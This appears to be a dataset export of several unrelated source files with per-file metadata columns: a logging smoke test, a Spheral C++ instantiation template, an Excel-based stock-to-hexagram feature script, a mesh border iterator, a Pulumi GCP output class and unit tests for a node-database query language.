    """Smoke test: zzlog and its public ``setup`` helper must be importable."""
    import zzlog  # noqa: F401 -- import success is the whole assertion
    from zzlog import setup  # noqa: F401 -- public entry point must exist
| 23
| 41
| 0.663043
| 13
| 92
| 4.615385
| 0.615385
| 0.266667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 0.26087
| 92
| 3
| 42
| 30.666667
| 0.794118
| 0.228261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 1
| 0
| 1.333333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8342488147cfa70d7e0a10ed3eec357600c6df69
| 2,714
|
py
|
Python
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 22
|
2018-07-31T21:38:22.000Z
|
2020-06-29T08:58:33.000Z
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 41
|
2020-09-28T23:14:27.000Z
|
2022-03-28T17:01:33.000Z
|
src/Mesh/generateMeshInst.cc.py
|
jmikeowen/Spheral
|
3e1082a7aefd6b328bd3ae24ca1a477108cfc3c4
|
[
"BSD-Source-Code",
"BSD-3-Clause-LBNL",
"FSFAP"
] | 7
|
2019-12-01T07:00:06.000Z
|
2020-09-15T21:12:39.000Z
|
# C++ source template for the explicit instantiations of Spheral's
# generateMesh<> for one dimensionality.  The build expands `%(ndim)s` via
# %-formatting; the three instantiations differ only in the const-ness of the
# NodeList/Boundary iterator types.  Do not edit the string's whitespace: it
# is emitted verbatim into a .cc file.
text = """
//------------------------------------------------------------------------------
// Explicit instantiation.
//------------------------------------------------------------------------------
#include "Mesh/generateMesh.cc"
namespace Spheral {
template void generateMesh<Dim< %(ndim)s >,
vector<NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::iterator>
(const vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
template void generateMesh<Dim< %(ndim)s >,
vector<const NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::const_iterator>
(const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::const_iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
template void generateMesh<Dim< %(ndim)s >,
vector<const NodeList<Dim< %(ndim)s > >*>::iterator,
vector<Boundary<Dim< %(ndim)s > >*>::iterator>
(const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListBegin,
const vector<const NodeList<Dim< %(ndim)s > >*>::iterator nodeListEnd,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryBegin,
const vector<Boundary<Dim< %(ndim)s > >*>::iterator boundaryEnd,
const Dim< %(ndim)s >::Vector& xmin,
const Dim< %(ndim)s >::Vector& xmax,
const bool meshGhostNodes,
const bool generateVoid,
const bool generateParallelConnectivity,
const bool removeBoundaryZones,
const double voidThreshold,
Mesh<Dim< %(ndim)s > >& mesh,
NodeList<Dim< %(ndim)s > >& voidNodes);
}
"""
| 43.774194
| 81
| 0.594694
| 279
| 2,714
| 5.774194
| 0.11828
| 0.143389
| 0.163873
| 0.148976
| 0.959032
| 0.959032
| 0.959032
| 0.93234
| 0.866543
| 0.866543
| 0
| 0
| 0.1986
| 2,714
| 61
| 82
| 44.491803
| 0.74069
| 0
| 0
| 0.785714
| 0
| 0
| 0.994842
| 0.099116
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
360c36318dca57470cdde015ad3abdd21becd932
| 13,084
|
py
|
Python
|
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | 20
|
2019-01-08T08:13:39.000Z
|
2021-12-23T09:04:14.000Z
|
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | null | null | null |
yxf_yixue/app_yixuecegu/datax.py
|
lamzuzuzu/yxf_yixue_py
|
90eb077f195b543f93a507f28b0a4c016cb0c92f
|
[
"MIT"
] | 13
|
2019-04-22T03:25:13.000Z
|
2022-01-04T05:43:48.000Z
|
import os
import openpyxl
import openpyxl.utils
from utils._excel2db import Excel2Db
# 生成数据库,只需要在最初执行一次
def gen_db():
    """Build the app's database from the spreadsheets under ``origin_data``.

    Run once during initial setup (per the module comment above).  Delegates
    the whole conversion to the project's ``Excel2Db`` helper, reading from
    the ``origin_data`` directory next to this file.
    """
    c = Excel2Db('app_yixuecegu.db')
    c.transform2db(os.path.join(os.path.dirname(os.path.abspath(__file__)),'origin_data'))
class WangqiLuyao:
    """Converts raw stock-index spreadsheets into hexagram-feature tables.

    Two passes over an openpyxl workbook:

    * ``execute_xlsx1`` reads the raw index sheet and emits a feature sheet
      (six "yao" base values X11..X16 plus derived sums/squares/cubes and a
      hexagram number looked up from the 64-hexagram reference table).
    * ``execute_xlsx2`` copies a sheet and appends next-period label columns.

    The three supported indices dispatch by method name (``<index>_1`` ..
    ``<index>_4``); those public method names and signatures are part of the
    interface and must not change.

    Fixes vs. the previous revision:
    * ``shangzhengzhishu_2`` bound the first cell to ``DATE`` but then used
      an undefined ``NUM`` when building the output row (NameError); it now
      binds ``NUM`` like its siblings.
    * ``eval("self." + ...)`` dispatch replaced by ``getattr`` (same behavior,
      no string evaluation).
    * The three near-identical per-index method sets now share private
      helpers instead of ~90 duplicated lines each.
    """

    # Title row for the NUM/GH1-style feature sheets (column letters noted).
    _FEATURE_TITLES = [
        'NUM',  # 1,A
        'GH1',  # 2,B
        'X11', 'X12', 'X13', 'X14', 'X15', 'X16',  # 3-8,C-H
        'X17', 'X18', 'X19', 'X110', 'X111', 'X112', 'X113', 'X114', 'X115', 'X116',  # 9-18,I-R
        'X117', 'X118', 'X119', 'X120', 'X121', 'X122', 'X123', 'X124', 'X125', 'X126',  # 19-28,S-AB
        'F1'  # 29,AC
    ]

    def __init__(self):
        pass

    def execute_xlsx1(self, typ, path1, path2):
        """Pass 1: read raw sheet ``path1`` and write the feature sheet ``path2``.

        ``typ`` selects the index (see :meth:`check`); paths are resolved
        relative to the current working directory.
        """
        realpath1 = os.path.join(os.getcwd(), path1)
        realpath2 = os.path.join(os.getcwd(), path2)
        wb_origin = openpyxl.load_workbook(realpath1)
        ws_origin = wb_origin.active
        # Dispatch by index name; getattr replaces the original eval() call.
        wb_work, ws_work = getattr(self, self.check(typ) + '_1')(realpath2)
        rows = ws_origin.max_row  # loop-invariant, hoisted out of the loop
        for i, _row in enumerate(ws_origin):
            if i == 0:
                continue  # skip the title row
            if rows - i <= 6:
                break  # last 6 rows lack enough history for the six yao
            arr = getattr(self, self.check(typ) + '_2')(ws_origin, i)
            print(arr[0])  # progress echo (row key)
            ws_work.append(arr)
        wb_work.save(realpath2)

    def execute_xlsx2(self, typ, path1, path2):
        """Pass 2: copy sheet ``path1`` into ``path2`` with label columns added.

        The label needs the *next* period's value, so the title row and the
        first data row are skipped (``i <= 1``).
        """
        realpath1 = os.path.join(os.getcwd(), path1)
        realpath2 = os.path.join(os.getcwd(), path2)
        wb_origin = openpyxl.load_workbook(realpath1)
        ws_origin = wb_origin.active
        wb_work, ws_work = getattr(self, self.check(typ) + '_3')(ws_origin, realpath2)
        for i, _row in enumerate(ws_origin):
            if i <= 1:
                continue  # title row + first data row (no future value)
            arr = getattr(self, self.check(typ) + '_4')(ws_origin, i)
            print(arr[0])
            ws_work.append(arr)
        wb_work.save(realpath2)

    @staticmethod
    def check(typ):
        """Map a Chinese index name to its method-name prefix; raise on unknown."""
        if typ == "上证指数":
            return "shangzhengzhishu"
        elif typ == "深证成指":
            return "shenzhengchengzhi"
        elif typ == "沪深300":
            return "hushen300"
        else:
            raise ImportError("输入参数错误:typ=" + typ)

    # ------------------------------------------------------------------ #
    # shared private helpers
    # ------------------------------------------------------------------ #

    @staticmethod
    def _new_sheet(realpath2, titles):
        """Recreate the target workbook from scratch and write the title row."""
        if os.path.exists(realpath2):
            os.remove(realpath2)
        wb_work = openpyxl.Workbook()
        ws_work = wb_work.active
        ws_work.append(titles)
        return wb_work, ws_work

    @staticmethod
    def _passthrough_sheet(ws_origin, realpath2, extra_titles):
        """Recreate the target workbook, copying the source title row plus extras."""
        if os.path.exists(realpath2):
            os.remove(realpath2)
        wb_work = openpyxl.Workbook()
        ws_work = wb_work.active
        titles = [col.value for col in ws_origin[1]]
        titles.extend(extra_titles)
        ws_work.append(titles)
        return wb_work, ws_work

    @staticmethod
    def _derived_features(X):
        """Return the 20 derived features X17..X126 for base yao values ``X``.

        Order matches the output columns: pairwise sums, triple sums,
        squares, cubes, then prefix sums of length 4/5/6.
        """
        X11, X12, X13, X14, X15, X16 = X
        return [
            X11 + X12, X13 + X14, X15 + X16,                       # X17-X19
            X11 + X12 + X13, X14 + X15 + X16,                      # X110, X111
            X11 * X11, X12 * X12, X13 * X13,                       # X112-
            X14 * X14, X15 * X15, X16 * X16,                       # -X117
            X11 ** 3, X12 ** 3, X13 ** 3,                          # X118-
            X14 ** 3, X15 ** 3, X16 ** 3,                          # -X123
            X11 + X12 + X13 + X14,                                 # X124
            X11 + X12 + X13 + X14 + X15,                           # X125
            X11 + X12 + X13 + X14 + X15 + X16,                     # X126
        ]

    @staticmethod
    def _gua_lookup(X):
        """Return the hexagram number (GH) for the six yao values ``X``.

        Zero/positive yao -> 1, negative -> 0; ``X[0]`` is the bottom line
        (lowest bit).  The resulting 0-63 code is looked up in column 5 of
        the 64-hexagram reference sheet; column 1 holds the hexagram number.
        """
        guashu = sum((1 if x >= 0 else 0) << k for k, x in enumerate(X))
        # NOTE(review): Windows-style relative path with literal backslashes,
        # kept as-is for behavioral compatibility -- not portable to POSIX.
        wb_gua = openpyxl.load_workbook(os.path.join(os.getcwd(), '..\common\common_data\基础表-六十四卦.xlsx'))
        ws_gua = wb_gua.active
        gh = None
        for row in ws_gua:
            if row[4].value == guashu:
                gh = row[0].value
        return gh

    # ------------------------------------------------------------------ #
    # 上证指数 (Shanghai Composite)
    # ------------------------------------------------------------------ #

    def shangzhengzhishu_1(self, realpath2):
        """Create the 上证指数 feature sheet with its (distinct) title row."""
        # NOTE(review): this header has 35 columns while shangzhengzhishu_2
        # emits 29-value rows -- apparent mismatch, kept as-is; TODO confirm.
        return self._new_sheet(realpath2, [
            '日期',
            '卦号',
            'X1', 'X2', 'X3', 'X4', 'X5', 'X6',
            'XR1', 'XR2', 'XR3', 'XR4', 'XR5', 'XR6',
            'X7', 'X8', 'X9', 'X10', 'X11', 'X12', 'X13', 'X14', 'X15', 'X16',
            'X17', 'X18', 'X19', 'X20', 'X21', 'X22', 'X23', 'X24', 'X25', 'X26',
            'F',
        ])

    def shangzhengzhishu_2(self, ws_origin, i):
        """Build one 上证指数 feature row from source row ``i``."""
        # BUG FIX: this cell was previously bound to ``DATE`` while the output
        # row used an undefined ``NUM`` -- guaranteed NameError at runtime.
        NUM = ws_origin[i + 1][0].value
        F1 = ws_origin[i + 1][9].value
        try:
            # ``- 0`` coerces/validates numerics; rows i+7..i+9 are probed as
            # in the original so that a short sheet still trips the except.
            probe = [ws_origin[i + k][9].value - 0 for k in range(1, 10)]
            X = probe[:6]
        except:  # noqa: E722 -- invalid/missing rows collapse to the all-zero hexagram (乾卦)
            X = [0] * 6
        GH1 = self._gua_lookup(X)
        return [NUM, GH1] + X + self._derived_features(X) + [F1]

    def shangzhengzhishu_3(self, ws_origin, realpath2):
        """Create the 上证指数 label sheet (source titles + R1/RR1)."""
        return self._passthrough_sheet(ws_origin, realpath2, ('R1', 'RR1'))

    def shangzhengzhishu_4(self, ws_origin, i):
        """Copy source row ``i+1`` and append next-period value + sign label."""
        return self._row_with_sign_label(ws_origin, i)

    # ------------------------------------------------------------------ #
    # 深证成指 (Shenzhen Component)
    # ------------------------------------------------------------------ #

    def shenzhengchengzhi_1(self, realpath2):
        """Create the 深证成指 feature sheet with the standard title row."""
        return self._new_sheet(realpath2, list(self._FEATURE_TITLES))

    def shenzhengchengzhi_2(self, ws_origin, i):
        """Build one 深证成指 feature row: yao are consecutive differences."""
        NUM = ws_origin[i + 1][0].value
        F1 = ws_origin[i + 1][9].value
        try:
            closes = [ws_origin[i + k][9].value for k in range(1, 8)]
            X = [closes[k] - closes[k + 1] for k in range(6)]
        except:  # noqa: E722 -- invalid/missing rows collapse to all-zero yao
            X = [0] * 6
        GH1 = self._gua_lookup(X)
        return [NUM, GH1] + X + self._derived_features(X) + [F1]

    def shenzhengchengzhi_3(self, ws_origin, realpath2):
        """Create the 深证成指 label sheet (source titles + R1/XFR1)."""
        return self._passthrough_sheet(ws_origin, realpath2, ('R1', 'XFR1'))

    def shenzhengchengzhi_4(self, ws_origin, i):
        """Copy source row ``i+1`` and append next value and next-diff labels."""
        arr = [col.value for col in ws_origin[i + 1]]
        r1 = int(ws_origin[i][9].value)
        xfr1 = r1 - int(ws_origin[i + 1][9].value)
        arr.append(r1)
        arr.append(xfr1)
        return arr

    # ------------------------------------------------------------------ #
    # 沪深300 (CSI 300)
    # ------------------------------------------------------------------ #

    def hushen300_1(self, realpath2):
        """Create the 沪深300 feature sheet with the standard title row."""
        return self._new_sheet(realpath2, list(self._FEATURE_TITLES))

    def hushen300_2(self, ws_origin, i):
        """Build one 沪深300 feature row from source row ``i``."""
        NUM = ws_origin[i + 1][0].value
        F1 = ws_origin[i + 1][9].value
        try:
            X = [ws_origin[i + k][9].value - 0 for k in range(1, 7)]
        except:  # noqa: E722 -- invalid/missing rows collapse to the all-zero hexagram (乾卦)
            X = [0] * 6
        GH1 = self._gua_lookup(X)
        return [NUM, GH1] + X + self._derived_features(X) + [F1]

    def hushen300_3(self, ws_origin, realpath2):
        """Create the 沪深300 label sheet (source titles + R1/TF1)."""
        return self._passthrough_sheet(ws_origin, realpath2, ('R1', 'TF1'))

    def hushen300_4(self, ws_origin, i):
        """Copy source row ``i+1`` and append next-period value + sign label."""
        return self._row_with_sign_label(ws_origin, i)

    @staticmethod
    def _row_with_sign_label(ws_origin, i):
        """Shared *_4 body: copy row ``i+1``, append next value R1 and sign(R1)."""
        arr = [col.value for col in ws_origin[i + 1]]
        r1 = ws_origin[i][2].value
        arr.append(r1)
        arr.append(1 if r1 >= 0 else -1)
        return arr
| 31.004739
| 106
| 0.4893
| 1,796
| 13,084
| 3.475501
| 0.11971
| 0.07818
| 0.07065
| 0.028837
| 0.862384
| 0.862384
| 0.828741
| 0.774111
| 0.774111
| 0.774111
| 0
| 0.187508
| 0.375955
| 13,084
| 421
| 107
| 31.078385
| 0.576975
| 0.068863
| 0
| 0.774481
| 0
| 0
| 0.049698
| 0.008683
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050445
| false
| 0.002967
| 0.014837
| 0
| 0.11276
| 0.005935
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
360c5bdce1741e3af722e2491f5fa293e6c49051
| 3,448
|
py
|
Python
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | 11
|
2016-10-25T09:48:36.000Z
|
2021-01-30T18:59:50.000Z
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | 1
|
2017-09-19T06:03:36.000Z
|
2017-09-28T11:29:23.000Z
|
src/computation/split_and_merge/util/node_border_iterator.py
|
sciapp/pyMolDyn
|
fba6ea91cb185f916b930cd25b4b1d28a22fb4c5
|
[
"MIT"
] | null | null | null |
import itertools as it
def iterate_node_border(node, func):
    """Invoke ``func(x, y, z)`` for every cell of the one-cell-thick shell
    around *node*, where ``node == ((x, y, z), (w, h, d))``.

    The six faces are visited in order: bottom (y-1), top (y+h), left (x-1),
    right (x+w), front (z-1), back (z+d).
    NOTE(review): the per-face ranges are deliberately asymmetric (some faces
    include corner/edge cells that others omit), matching the original
    enumeration exactly.
    """
    (ox, oy, oz), (w, h, d) = node
    shell = []
    for x in range(ox, ox + w + 1):
        for z in range(oz, oz + d + 1):
            shell.append((x, oy - 1, z))
    for x in range(ox, ox + w + 1):
        for z in range(oz, oz + d + 1):
            shell.append((x, oy + h, z))
    for y in range(oy - 1, oy + h + 1):
        for z in range(oz - 1, oz + d + 1):
            shell.append((ox - 1, y, z))
    for y in range(oy, oy + h):
        for z in range(oz, oz + d + 1):
            shell.append((ox + w, y, z))
    for x in range(ox, ox + w + 1):
        for y in range(oy - 1, oy + h + 1):
            shell.append((x, y, oz - 1))
    for x in range(ox, ox + w):
        for y in range(oy, oy + h):
            shell.append((x, y, oz + d))
    for x, y, z in shell:
        func(x, y, z)
def iterate_node_border_with_adjacent_node_cells(node, func):
    """Call ``func(x, y, z, adjacent_node_cells)`` for every cell of the
    one-cell-thick shell around *node* (= ((x, y, z), (w, h, d))).

    ``adjacent_node_cells`` is a tuple of node-interior cell coordinates
    touching that border cell: a neighbourhood clamped to the node extent in
    the two in-face axes and pinned to the node's boundary layer in the
    face-normal axis.  Face order and per-face ranges mirror
    ``iterate_node_border`` exactly (including its asymmetric corner/edge
    coverage).
    """
    node_x, node_y, node_z = node[0]
    node_w, node_h, node_d = node[1]
    # Six faces: bottom (y-1), top (y+h), left (x-1), right (x+w),
    # front (z-1), back (z+d).  Each tuple's 4th element is the clamped
    # patch of interior cells adjacent to the border cell.
    border_points = [(x, node_y-1, z, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), [node_y], range(max(z-1, node_z), min(z+2, node_z+node_d))))) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)]
    border_points.extend([(x, node_y+node_h, z, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), [node_y+node_h-1], range(max(z-1, node_z), min(z+2, node_z+node_d))))) for x in range(node_x, node_x+node_w+1) for z in range(node_z, node_z+node_d+1)])
    border_points.extend([(node_x-1, y, z, tuple(it.product([node_x], range(max(y-1, node_y), min(y+2, node_y+node_h)), range(max(z-1, node_z), min(z+2, node_z+node_d))))) for y in range(node_y-1, node_y+node_h+1) for z in range(node_z-1, node_z+node_d+1)])
    border_points.extend([(node_x+node_w, y, z, tuple(it.product([node_x+node_w-1], range(max(y-1, node_y), min(y+2, node_y+node_h)), range(max(z-1, node_z), min(z+2, node_z+node_d))))) for y in range(node_y, node_y+node_h) for z in range(node_z, node_z+node_d+1)])
    border_points.extend([(x, y, node_z-1, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), range(max(y-1, node_y), min(y+2, node_y+node_h)), [node_z]) )) for x in range(node_x, node_x+node_w+1) for y in range(node_y-1, node_y+node_h+1)])
    border_points.extend([(x, y, node_z+node_d, tuple(it.product(range(max(x-1, node_x), min(x+2, node_x+node_w)), range(max(y-1, node_y), min(y+2, node_y+node_h)), [node_z+node_d-1]) )) for x in range(node_x, node_x+node_w) for y in range(node_y, node_y+node_h) ])
    for border_x, border_y, border_z, adjacent_node_cells in border_points:
        func(border_x, border_y, border_z, adjacent_node_cells)
| 107.75
| 326
| 0.575696
| 651
| 3,448
| 2.764977
| 0.046083
| 0.088889
| 0.125
| 0.083333
| 0.955556
| 0.946111
| 0.946111
| 0.925
| 0.925
| 0.906111
| 0
| 0.024646
| 0.282193
| 3,448
| 31
| 327
| 111.225806
| 0.702626
| 0
| 0
| 0.173913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
361c97cbcf4541c89bf1887ac753c262f6ba3a9c
| 2,990
|
py
|
Python
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/securitycenter/outputs.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'NotificationConfigStreamingConfig',
]
# Machine-generated by the Pulumi Terraform Bridge (see file header):
# do not hand-edit semantics; regenerate instead.
@pulumi.output_type
class NotificationConfigStreamingConfig(dict):
    def __init__(__self__, *,
                 filter: str):
        """
        :param str filter: Expression that defines the filter to apply across create/update
               events of assets or findings as specified by the event type. The
               expression is a list of zero or more restrictions combined via
               logical operators AND and OR. Parentheses are supported, and OR
               has higher precedence than AND.
               Restrictions have the form <field> <operator> <value> and may have
               a - character in front of them to indicate negation. The fields
               map to those defined in the corresponding resource.
               The supported operators are:
               * = for all value types.
               * >, <, >=, <= for integer values.
               * :, meaning substring matching, for strings.
               The supported value types are:
               * string literals in quotes.
               * integer literals without quotes.
               * boolean literals true and false without quotes.
               See
               [Filtering notifications](https://cloud.google.com/security-command-center/docs/how-to-api-filter-notifications)
               for information on how to write a filter.
        """
        # Stored via pulumi.set so the output_type machinery tracks the value.
        pulumi.set(__self__, "filter", filter)

    @property
    @pulumi.getter
    def filter(self) -> str:
        """
        Expression that defines the filter to apply across create/update
        events of assets or findings as specified by the event type. The
        expression is a list of zero or more restrictions combined via
        logical operators AND and OR. Parentheses are supported, and OR
        has higher precedence than AND.
        Restrictions have the form <field> <operator> <value> and may have
        a - character in front of them to indicate negation. The fields
        map to those defined in the corresponding resource.
        The supported operators are:
        * = for all value types.
        * >, <, >=, <= for integer values.
        * :, meaning substring matching, for strings.
        The supported value types are:
        * string literals in quotes.
        * integer literals without quotes.
        * boolean literals true and false without quotes.
        See
        [Filtering notifications](https://cloud.google.com/security-command-center/docs/how-to-api-filter-notifications)
        for information on how to write a filter.
        """
        return pulumi.get(self, "filter")
| 43.333333
| 127
| 0.638127
| 356
| 2,990
| 5.308989
| 0.38764
| 0.010582
| 0.022222
| 0.025397
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0.756614
| 0
| 0.000473
| 0.293645
| 2,990
| 68
| 128
| 43.970588
| 0.894413
| 0.717391
| 0
| 0
| 1
| 0
| 0.088933
| 0.065217
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.294118
| 0
| 0.529412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
365f8018a866d29a63bdb661b7fcacc0719a6958
| 6,985
|
py
|
Python
|
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | 1
|
2015-07-05T16:32:26.000Z
|
2015-07-05T16:32:26.000Z
|
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | null | null | null |
ndb_test/statement_test.py
|
node-db/ndb-py
|
0309a503ad27a0305234cabb9c4d895d46b874e2
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import os
import unittest
import ndb
class StatementTest(unittest.TestCase):
    '''
    node database statement unit test
    '''
    # NOTE(review): this module is Python 2 (bare ``print`` statement in
    # test_print_node) and uses the deprecated ``assertEquals`` alias
    # throughout -- left untouched here.

    def setUp(self):
        # Fresh node tree for every test; 'example.ndb' is the shared fixture.
        self.node = ndb.read('example.ndb')

    def test_exits(self):
        '''exits test'''
        # exist: returns True/False; '&&' combines field conditions,
        # '$' anchors a suffix match on the field value.
        result = ndb.execute(self.node, 'exist:root->parent->child->name:jim')
        self.assertEqual(result, True)
        result = ndb.execute(self.node, 'exist:root->parent->child->sex:male && name:m$')
        self.assertEqual(result, True)
        result = ndb.execute(self.node, 'exist:root->parent->child->sex:female && name:m$')
        self.assertEqual(result, False)

    def test_one(self):
        '''one test'''
        # one: returns a single matching node (attribute access via .get()).
        result = ndb.execute(self.node, 'one:root->parent->child->sex:male')
        self.assertEqual(result.get('name'), 'jim')
        self.assertEqual(result.get('age'), '20')

    def test_select(self):
        '''select test'''
        # select: returns a list; supports /regex/, [min,max] ranges,
        # ^prefix and suffix$ matches, '&&' conjunction, and a bare path.
        result = ndb.execute(self.node, 'select:root->parent->child->name:/.*m/')
        self.assertEquals(len(result), 2)
        self.assertEquals(result[0].get('name'), 'jim')
        self.assertEquals(result[1].get('name'), 'tom')
        result = ndb.execute(self.node, 'select:root->parent->child->age:[15,25]')
        self.assertEquals(len(result), 2)
        self.assertEquals(result[0].get('name'), 'jim')
        self.assertEquals(result[1].get('name'), 'lily')
        result = ndb.execute(self.node, 'select:root->parent->child->sex:^fe')
        self.assertEquals(len(result), 1)
        self.assertEquals(result[0].get('name'), 'lily')
        result = ndb.execute(self.node, 'select:root->parent->child->name:m$')
        self.assertEquals(len(result), 2)
        self.assertEquals(result[0].get('name'), 'jim')
        self.assertEquals(result[1].get('name'), 'tom')
        result = ndb.execute(self.node, 'select:root->parent->child->sex:male && age:[15,25]')
        self.assertEquals(len(result), 1)
        self.assertEquals(result[0].get('name'), 'jim')
        result = ndb.execute(self.node, 'select:root->parent->child')
        self.assertEquals(len(result), 3)
        self.assertEquals(result[0].get('name'), 'jim')
        self.assertEquals(result[1].get('name'), 'lily')
        self.assertEquals(result[2].get('name'), 'tom')
        result = ndb.execute(self.node, 'select:root->parent->:/child|nephew/->sex:female')
        self.assertEquals(len(result), 2)
        self.assertEquals(result[0].get('name'), 'lucy')
        self.assertEquals(result[1].get('name'), 'lily')

    def test_update(self):
        # NOTE(review): four leading quotes -- the docstring is actually
        # "'update test" (typo in the original, preserved).
        ''''update test'''
        # update ... !! k=v, ... sets/overwrites attributes on matches.
        result = ndb.execute(self.node, 'update:root->parent->child->name:jim !! age=21, address=China')
        result = ndb.execute(result, 'select:root->parent->child->name:jim')
        self.assertEquals(len(result), 1)
        self.assertEquals(result[0].get('age'), '21')
        self.assertEquals(result[0].get('address'), 'China')

    def test_delete(self):
        '''delete test'''
        # delete ... !! [attrs] removes attributes; '!! block' removes the node.
        result = ndb.execute(self.node, 'delete:root->parent->child->name:jim !! [sex, age]')
        result = ndb.execute( result, 'select:root->parent->child->name:jim')
        self.assertEquals(len(result), 1)
        self.assertEquals(result[0].get('name'), 'jim')
